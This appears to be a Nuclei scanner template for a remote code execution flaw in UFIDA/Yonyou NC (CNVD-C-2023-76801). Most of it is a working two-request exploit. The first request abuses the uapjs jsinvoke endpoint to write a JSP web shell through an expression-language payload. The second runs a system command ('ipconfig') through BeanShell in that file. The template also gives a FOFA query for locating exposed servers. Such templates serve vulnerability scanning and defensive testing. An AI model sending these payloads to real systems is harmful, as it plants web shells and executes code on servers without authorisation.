52 lines
1.8 KiB
YAML
52 lines
1.8 KiB
YAML
id: CNVD-C-2023-76801
|
|
|
|
info:
|
|
name: UFIDA NC uapjs - Remote Code Execution
|
|
author: SleepingBag945,s4e-io
|
|
severity: critical
|
|
description: |
|
|
There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
|
|
reference:
|
|
- https://mp.weixin.qq.com/s/8ZRrmUCD2bfznd1MyDDU8A
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
fofa-query: app="用友-NC-Cloud"
|
|
tags: cnvd,cnvd2023,yonyou,rce,intrusive
|
|
|
|
variables:
|
|
filename: "{{rand_base(12)}}"
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-type: application/x-www-form-urlencoded
|
|
|
|
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/{{filename}}.jsp"]}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "len(body)==0"
|
|
- 'status_code == 200'
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /{{filename}}.jsp?error=bsh.Interpreter HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-type: application/x-www-form-urlencoded
|
|
|
|
cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ipconfig").getInputStream())
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(body,"Windows", "<?xml", "DNS")'
|
|
- 'status_code == 200 || status_code == 404'
|
|
condition: and
|
|
# digest: 4b0a00483046022100a21d5c0aac454d1aa4f09bd6520a56bf881345a46af665d127655c0ab64ca995022100c0fbae12eb60b515d23864acc0aa4db16861b280619da913b14c9f2aaaaaf161:922c64590222798bb761d5b6d8e72950 |